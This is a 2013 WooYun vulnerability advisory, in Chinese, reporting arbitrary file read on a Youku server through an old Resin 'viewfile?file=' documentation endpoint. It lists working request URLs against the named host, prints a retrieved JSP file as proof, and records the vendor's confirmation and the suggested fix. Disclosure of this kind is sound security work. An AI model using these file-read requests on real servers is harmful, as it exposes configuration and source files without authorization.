当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-019360

漏洞标题:优酷某站服务器任意文件读取

相关厂商:优酷

漏洞作者: upload

提交时间:2013-03-01 12:08

修复时间:2013-04-15 12:09

公开时间:2013-04-15 12:09

漏洞类型:系统/服务运维配置不当

危害等级:中

自评Rank:5

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-03-01: 细节已通知厂商并且等待厂商处理中
2013-03-01: 厂商已经确认,细节仅向厂商公开
2013-03-11: 细节向核心白帽子及相关领域专家公开
2013-03-21: 细节向普通白帽子公开
2013-03-31: 细节向实习白帽子公开
2013-04-15: 细节向公众公开

简要描述:

配置不当,导致文件读取

详细说明:

一些旧版本的Resin服务器存在读取任意文件或者直接列出目标目录文件的漏洞
urls:

http://index.youku.com/resin-doc/examples/ioc-periodictask/viewfile?file=index.xtp


http://index.youku.com/resin-doc/examples/ioc-periodictask/viewfile?file=WEB-INF/web.xml


不太懂爪哇,没找到敏感文件,但是还是个问题吧

漏洞证明:

url:

http://index.youku.com/resin-doc/examples/ioc-periodictask/viewfile?file=admin/mbean.jsp


code:

<%@ page session="false" import="javax.management.* com.caucho.jmx.Jmx java.util.*" %>
<%@ taglib uri="http://java.sun.com/jsp/jstl/core" prefix="c" %>
<%
// stop browser from caching the page
response.setHeader("Cache-Control","no-cache,post-check=0,pre-check=0,no-store");
response.setHeader("Pragma","no-cache");
response.setHeader("Expires","Thu,01Dec199416:00:00GMT");
// refresh every 5 seconds
response.setHeader("refresh","5");
// prepare objects
ObjectName query = new ObjectName("resin:type=PeriodicTask,*");
pageContext.setAttribute("mbeans",Jmx.query(query));
%>
<html>
<head><title>mbean</title></head>
<body>
<h1>mbean</h1>
This page is automatically refreshed every 5 seconds.
<c:forEach var="mbean" items="${mbeans}">
<hr/>
<dl>
<dt>estimatedAverageTime
<dd>${mbean.estimatedAverageTime}
<dt>active
<dd>${mbean.active}
<dt>estimatedTimeRemaining
<dd>${mbean.estimatedTimeRemaining}
<dt>lastActiveTime
<dd>${mbean.lastActiveTime}
<dt>totalActiveCount
<dd>${mbean.totalActiveCount}
<dt>totalActiveTime
<dd>${mbean.totalActiveTime}
<dt>averageActiveTime
<dd>${mbean.averageActiveTime}
</dl>
</c:forEach>
<hr/>
</body>
</html>


修复方案:

升级服务器版本或设置权限

版权声明:转载请注明来源 upload@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2013-03-01 12:11

厂商回复:

谢谢

最新状态:

暂无